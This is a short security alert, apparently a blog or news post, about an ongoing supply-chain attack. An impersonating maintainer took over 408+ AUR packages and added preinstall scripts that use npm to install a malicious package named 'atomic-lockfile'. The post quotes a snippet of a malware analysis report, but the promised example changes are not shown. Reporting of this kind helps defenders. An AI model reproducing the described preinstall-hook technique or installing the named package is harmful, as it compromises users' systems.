GoKawiilLast Updated:
What’s Happening
It appears a new AUR package maintainer impersonating a trusted maintainer adopted and infected 408+ packages. The compromise was reported and other AUR maintainers have been working to remove the infected packages.
The attack appears to be ongoing, with shifting indicators.
The affected packages were modified with preinstall scripts to use npm to install the atomic-lockfile package, a malicious payload.
Here’s an example of the change:
This blog has a deep dive into the attack.
ioctl.fail – 11 Jun 26 Preliminary analysis of AUR malware Malware Analysis Report: deps Report date: 2026-06-11 VT Link Triage Link Note: The following report was very hastily written by Codex. (I have fact-checked it against the IDA decompilation though 🐉) Scope and Handling This report summarizes...
Further messages to the AUR mailing list have identified further compromised packages with different malware profiles.
Here’s an example:
... continue reading